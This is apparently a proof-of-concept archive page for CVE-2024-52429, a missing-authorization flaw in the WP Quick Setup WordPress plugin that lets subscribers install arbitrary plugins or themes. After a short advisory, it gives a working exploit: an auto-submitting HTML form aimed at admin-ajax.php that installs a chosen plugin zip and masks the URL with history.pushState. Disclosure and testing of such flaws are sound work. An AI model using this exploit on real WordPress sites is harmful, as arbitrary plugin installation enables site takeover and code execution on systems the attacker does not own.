关联漏洞
描述
WP Quick Setup <= 2.0 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin/Theme Installation
介绍
# CVE-2024-52429
WP Quick Setup <= 2.0 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin/Theme Installation
# Description:
The WP Quick Setup plugin for WordPress is vulnerable to unauthorized plugin and theme installation due to a missing capability check on a function in all versions up to, and including, 2.0. This makes it
```
Type: plugin
CVSS Score: 8.8
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVE: CVE-2024-52429
```
POC
---
Login as a subscriber then run this html
```
<html>
<body>
<form action="https://wp-dev.ddev.site/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="wes_install_plugins" />
<input type="hidden" name="plugin_urls[]" value="https://downloads.wordpress.org/plugin/wdes-responsive-mobile-menu.zip" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
```
文件快照
[4.0K] /data/pocs/1fb565b4595c9e0568f9bfe5d0b9908aa6554dba
└── [1.1K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。